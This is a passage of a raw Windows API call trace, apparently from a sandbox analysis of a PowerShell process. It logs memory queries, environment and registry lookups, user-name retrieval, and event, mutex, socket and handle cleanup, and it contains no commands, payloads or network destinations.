| out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.488] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.488] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.489] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.489] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.489] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.490] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.490] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.490] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.490] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.491] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.491] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.496] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.497] CoTaskMemFree (pv=0x10cff0) [0138.515] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.515] CoTaskMemFree (pv=0x10cff0) [0138.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.579] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.588] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.588] VirtualQuery (in: lpAddress=0xcb2b0, lpBuffer=0xcc170, dwLength=0x30 | out: lpBuffer=0xcc170*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.588] VirtualQuery (in: lpAddress=0xcb2b0, lpBuffer=0xcc170, dwLength=0x30 | out: lpBuffer=0xcc170*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.591] CoTaskMemAlloc (cb=0x5a) returned 0x1bd890 [0138.591] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd80c, lpData=0x1bd890, lpcbData=0xcd808*=0x56 | out: lpType=0xcd80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd808*=0x56) returned 0x0 [0138.592] CoTaskMemFree (pv=0x1bd890) [0138.592] RegCloseKey (hKey=0x3a4) returned 0x0 [0138.592] CoTaskMemAlloc (cb=0x5a) returned 0x1bd890 [0138.592] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd80c, lpData=0x1bd890, lpcbData=0xcd808*=0x56 | out: lpType=0xcd80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd808*=0x56) returned 0x0 [0138.592] CoTaskMemFree (pv=0x1bd890) [0138.592] RegCloseKey (hKey=0x3a4) returned 0x0 [0138.593] CoTaskMemAlloc (cb=0x20c) returned 0x1ac580 [0138.593] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ac580 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\Documents") returned 0x0 [0138.594] CoTaskMemFree (pv=0x1ac580) [0138.594] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Documents", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Documents", lpFilePart=0x0) returned 0x21 [0138.594] CoTaskMemAlloc (cb=0x20c) returned 0x1ac580 [0138.594] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ac580 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\Documents") returned 0x0 [0138.595] CoTaskMemFree (pv=0x1ac580) [0138.595] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Documents", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Documents", lpFilePart=0x0) returned 0x21 [0138.597] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.597] CoTaskMemFree (pv=0x10cff0) [0138.598] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.598] CoTaskMemFree (pv=0x10cff0) [0138.598] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.598] CoTaskMemFree (pv=0x10cff0) [0138.599] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.599] CoTaskMemFree (pv=0x10cff0) [0138.610] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.610] CoTaskMemFree (pv=0x10cff0) [0138.614] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.614] CoTaskMemFree (pv=0x10cff0) [0138.619] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0138.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcda00 | out: lpMode=0xcda00) returned 1 [0138.621] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.622] CoTaskMemFree (pv=0x10cff0) [0138.625] SetEvent (hEvent=0x394) returned 1 [0138.625] SetEvent (hEvent=0x3a4) returned 1 [0138.625] SetEvent (hEvent=0x370) returned 1 [0138.625] SetEvent (hEvent=0x390) returned 1 [0138.626] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.627] CoTaskMemFree (pv=0x10cff0) [0138.627] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.627] CoTaskMemFree (pv=0x10cff0) [0138.628] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c [0138.630] SetEvent (hEvent=0x39c) returned 1 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x520 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x51c [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f4 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x524 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x52c [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x570 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x540 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x580 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x584 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x588 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x58c [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x590 [0149.860] SetEvent (hEvent=0x524) returned 1 [0149.860] SetEvent (hEvent=0x520) returned 1 [0149.860] SetEvent (hEvent=0x51c) returned 1 [0149.861] SetEvent (hEvent=0x4f4) returned 1 [0149.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x594 [0149.861] SetEvent (hEvent=0x39c) returned 1 [0149.870] SetEvent (hEvent=0x52c) returned 1 [0149.870] SetEvent (hEvent=0x570) returned 1 [0149.870] SetEvent (hEvent=0x540) returned 1 [0150.235] CoTaskMemAlloc (cb=0x104) returned 0x1b8694a0 [0150.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8694a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.236] CoTaskMemFree (pv=0x1b8694a0) [0151.415] SetEvent (hEvent=0x31c) returned 1 [0151.417] CoTaskMemAlloc (cb=0x804) returned 0x1b86b140 [0151.417] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86b140, nSize=0xcd888 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd888) returned 0x1 [0151.418] CoTaskMemFree (pv=0x1b86b140) [0151.418] CoTaskMemAlloc (cb=0x204) returned 0x14f070 [0151.418] GetUserNameW (in: lpBuffer=0x14f070, pcbBuffer=0xcd8c8 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd8c8) returned 1 [0151.418] CoTaskMemFree (pv=0x14f070) [0151.421] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f5d338*="Stopped", lpRawData=0x2f5d0c8) returned 1 [0151.836] SetEvent (hEvent=0x39c) returned 1 [0151.846] CloseHandle (hObject=0x39c) returned 1 [0151.847] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0151.850] CoGetContextToken (in: pToken=0xcf450 | out: pToken=0xcf450) returned 0x0 [0151.850] CObjectContext::QueryInterface () returned 0x0 [0151.850] CObjectContext::GetCurrentThreadType () returned 0x0 [0151.850] Release () returned 0x0 [0151.852] CoGetContextToken (in: pToken=0xcf020 | out: pToken=0xcf020) returned 0x0 [0151.852] CObjectContext::QueryInterface () returned 0x0 [0151.852] CObjectContext::GetCurrentThreadType () returned 0x0 [0151.852] Release () returned 0x0 [0151.854] CoGetContextToken (in: pToken=0xcf020 | out: pToken=0xcf020) returned 0x0 [0151.854] CObjectContext::QueryInterface () returned 0x0 [0151.854] CObjectContext::GetCurrentThreadType () returned 0x0 [0151.854] Release () returned 0x0 [0152.462] CoGetContextToken (in: pToken=0xcf020 | out: pToken=0xcf020) returned 0x0 [0152.462] CObjectContext::QueryInterface () returned 0x0 [0152.462] CObjectContext::GetCurrentThreadType () returned 0x0 [0152.462] Release () returned 0x0 [0152.506] CoGetContextToken (in: pToken=0xcf010 | out: pToken=0xcf010) returned 0x0 [0152.506] CObjectContext::QueryInterface () returned 0x0 [0152.506] CObjectContext::GetCurrentThreadType () returned 0x0 [0152.506] Release () returned 0x0 [0152.507] CoUninitialize () Thread: id = 44 os_tid = 0x810 Thread: id = 45 os_tid = 0x4e4 Thread: id = 46 os_tid = 0x768 Thread: id = 47 os_tid = 0x79c Thread: id = 48 os_tid = 0x4d0 [0129.119] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0134.501] LocalFree (hMem=0x11b2e0) returned 0x0 [0134.501] CloseHandle (hObject=0x320) returned 1 [0134.501] CloseHandle (hObject=0x13) returned 1 [0134.502] CloseHandle (hObject=0xf) returned 1 [0134.502] RegCloseKey (hKey=0x30c) returned 0x0 [0134.502] RegCloseKey (hKey=0x308) returned 0x0 [0134.502] RegCloseKey (hKey=0x304) returned 0x0 [0134.502] LocalFree (hMem=0x11b2c0) returned 0x0 [0134.503] RegCloseKey (hKey=0x32c) returned 0x0 [0135.623] RegCloseKey (hKey=0x304) returned 0x0 [0138.219] RegCloseKey (hKey=0x388) returned 0x0 [0138.220] RegCloseKey (hKey=0x384) returned 0x0 [0138.221] RegCloseKey (hKey=0x380) returned 0x0 [0138.221] RegCloseKey (hKey=0x37c) returned 0x0 [0138.221] RegCloseKey (hKey=0x378) returned 0x0 [0138.222] RegCloseKey (hKey=0x374) returned 0x0 [0138.222] RegCloseKey (hKey=0x350) returned 0x0 [0138.222] RegCloseKey (hKey=0x3a0) returned 0x0 [0138.223] RegCloseKey (hKey=0x36c) returned 0x0 [0138.223] RegCloseKey (hKey=0x368) returned 0x0 [0138.224] RegCloseKey (hKey=0x364) returned 0x0 [0138.224] RegCloseKey (hKey=0x360) returned 0x0 [0138.224] RegCloseKey (hKey=0x35c) returned 0x0 [0138.224] RegCloseKey (hKey=0x358) returned 0x0 [0138.225] RegCloseKey (hKey=0x354) returned 0x0 [0138.225] RegCloseKey (hKey=0x39c) returned 0x0 [0138.225] RegCloseKey (hKey=0x398) returned 0x0 [0138.225] RegCloseKey (hKey=0x344) returned 0x0 [0138.226] RegCloseKey (hKey=0x340) returned 0x0 [0138.226] RegCloseKey (hKey=0x33c) returned 0x0 [0138.226] RegCloseKey (hKey=0x338) returned 0x0 [0138.227] RegCloseKey (hKey=0x334) returned 0x0 [0138.227] RegCloseKey (hKey=0x330) returned 0x0 [0138.228] RegCloseKey (hKey=0x320) returned 0x0 [0138.228] RegCloseKey (hKey=0x308) returned 0x0 [0138.228] RegCloseKey (hKey=0x304) returned 0x0 [0138.228] RegCloseKey (hKey=0x394) returned 0x0 [0138.229] RegCloseKey (hKey=0x390) returned 0x0 [0138.229] RegCloseKey (hKey=0x370) returned 0x0 [0138.229] RegCloseKey (hKey=0x3a4) returned 0x0 [0140.478] RegCloseKey (hKey=0x398) returned 0x0 [0152.448] LocalFree (hMem=0x10cee0) returned 0x0 [0152.448] LocalFree (hMem=0x10cdd0) returned 0x0 [0152.449] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5d708, cbSid=0x1b50eff0 | out: pSid=0x2f5d708*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50eff0) returned 1 [0152.450] CreateMutexW (lpMutexAttributes=0x2f5d8c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.450] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.450] ReleaseMutex (hMutex=0x39c) returned 1 [0152.450] CloseHandle (hObject=0x39c) returned 1 [0152.450] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5dc18, cbSid=0x1b50eff0 | out: pSid=0x2f5dc18*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50eff0) returned 1 [0152.451] CreateMutexW (lpMutexAttributes=0x2f5ddd0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.451] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.451] ReleaseMutex (hMutex=0x39c) returned 1 [0152.451] CloseHandle (hObject=0x39c) returned 1 [0152.451] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5e128, cbSid=0x1b50eff0 | out: pSid=0x2f5e128*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50eff0) returned 1 [0152.451] CreateMutexW (lpMutexAttributes=0x2f5e2e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.452] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.452] ReleaseMutex (hMutex=0x39c) returned 1 [0152.452] CloseHandle (hObject=0x39c) returned 1 [0152.452] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5e638, cbSid=0x1b50eff0 | out: pSid=0x2f5e638*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50eff0) returned 1 [0152.452] CreateMutexW (lpMutexAttributes=0x2f5e7f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.452] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.452] ReleaseMutex (hMutex=0x39c) returned 1 [0152.453] CloseHandle (hObject=0x39c) returned 1 [0152.453] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5eb48, cbSid=0x1b50f020 | out: pSid=0x2f5eb48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50f020) returned 1 [0152.453] CreateMutexW (lpMutexAttributes=0x2f5ed00, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.453] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.453] ReleaseMutex (hMutex=0x39c) returned 1 [0152.453] CloseHandle (hObject=0x39c) returned 1 [0152.462] DeregisterEventSource (hEventLog=0x1b900008) returned 1 [0152.469] setsockopt (s=0x4f8, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0152.469] closesocket (s=0x4f8) returned 0 [0152.479] CloseHandle (hObject=0x434) returned 1 [0152.479] CloseHandle (hObject=0x430) returned 1 [0152.480] CloseHandle (hObject=0x3e8) returned 1 [0152.480] CloseHandle (hObject=0x3e4) returned 1 [0152.480] CloseHandle (hObject=0x3e0) returned 1 [0152.481] CloseHandle (hObject=0x3dc) returned 1 [0152.481] CloseHandle (hObject=0x3d8) returned 1 [0152.482] CloseHandle (hObject=0x594) returned 1 [0152.482] CloseHandle (hObject=0x3cc) returned 1 [0152.482] CloseHandle (hObject=0x3c8) returned 1 [0152.483] CloseHandle (hObject=0x3c4) returned 1 [0152.483] CloseHandle (hObject=0x3c0) returned 1 [0152.484] CloseHandle (hObject=0x3b8) returned 1 [0152.484] CloseHandle (hObject=0x398) returned 1 [0152.484] CloseHandle (hObject=0x3bc) returned 1 [0152.485] CloseHandle (hObject=0x590) returned 1 [0152.485] CloseHandle (hObject=0x58c) returned 1 [0152.485] CloseHandle (hObject=0x588) returned 1 [0152.486] setsockopt (s=0x50c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0152.486] closesocket (s=0x50c) returned 0 [0152.487] CloseHandle (hObject=0x510) returned 1 [0152.487] setsockopt (s=0x500, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0152.487] closesocket (s=0x500) returned 0 [0152.488] CloseHandle (hObject=0x508) returned 1 [0152.488] CloseHandle (hObject=0x584) returned 1 [0152.488] CloseHandle (hObject=0x580) returned 1 [0152.488] CloseHandle (hObject=0x540) returned 1 [0152.489] CloseHandle (hObject=0x570) returned 1 [0152.489] CloseHandle (hObject=0x52c) returned 1 [0152.489] CloseHandle (hObject=0x4e4) returned 1 [0152.490] CloseHandle (hObject=0x4e0) returned 1 [0152.490] CloseHandle (hObject=0x488) returned 1 [0152.490] CloseHandle (hObject=0x484) returned 1 [0152.491] CloseHandle (hObject=0x480) returned 1 [0152.491] CloseHandle 